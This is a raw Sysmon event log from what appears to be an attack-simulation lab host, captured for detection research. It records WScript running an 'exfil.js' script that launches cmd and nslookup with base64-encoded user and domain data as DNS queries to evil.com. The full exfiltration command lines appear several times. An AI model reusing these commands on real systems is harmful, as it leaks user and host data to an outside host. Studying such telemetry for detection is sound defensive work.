14:21:46.298{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.298{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.298{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-A845-000000005F02}6688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.298{2E1864BB-18FA-629A-A645-000000005F02}58162404C:\Windows\system32\cmd.exe{2E1864BB-18FA-629A-A845-000000005F02}6688C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.308{2E1864BB-18FA-629A-A845-000000005F02}6688C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FA-629A-A645-000000005F02}5816C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nludip.tmp 2>&1 10341000x8000000000000000213868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.277{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-A745-000000005F02}4060C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.277{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-A745-000000005F02}4060C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.277{2E1864BB-18FA-629A-A745-000000005F02}40607156C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-A645-000000005F02}5816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.261{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-A745-000000005F02}4060C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.261{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.261{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.261{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.261{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.261{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-A645-000000005F02}5816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.261{2E1864BB-18E0-629A-6742-000000005F02}39763832C:\Windows\System32\WScript.exe{2E1864BB-18FA-629A-A645-000000005F02}5816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.261{2E1864BB-18FA-629A-A645-000000005F02}5816C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nludip.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.245{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsgoost.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.214{2E1864BB-18FA-629A-A445-000000005F02}52285748C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-A545-000000005F02}4712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.214{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.214{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.214{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.214{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.214{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-A545-000000005F02}4712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.214{2E1864BB-18FA-629A-A345-000000005F02}2161432C:\Windows\system32\cmd.exe{2E1864BB-18FA-629A-A545-000000005F02}4712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.220{2E1864BB-18FA-629A-A545-000000005F02}4712C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FA-629A-A345-000000005F02}216C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsgoost.tmp 2>&1 10341000x8000000000000000213848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.198{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-A445-000000005F02}5228C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.198{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-A445-000000005F02}5228C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.193{2E1864BB-18FA-629A-A445-000000005F02}52285748C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-A345-000000005F02}216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.177{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-A445-000000005F02}5228C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.161{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-A345-000000005F02}216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.161{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.161{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 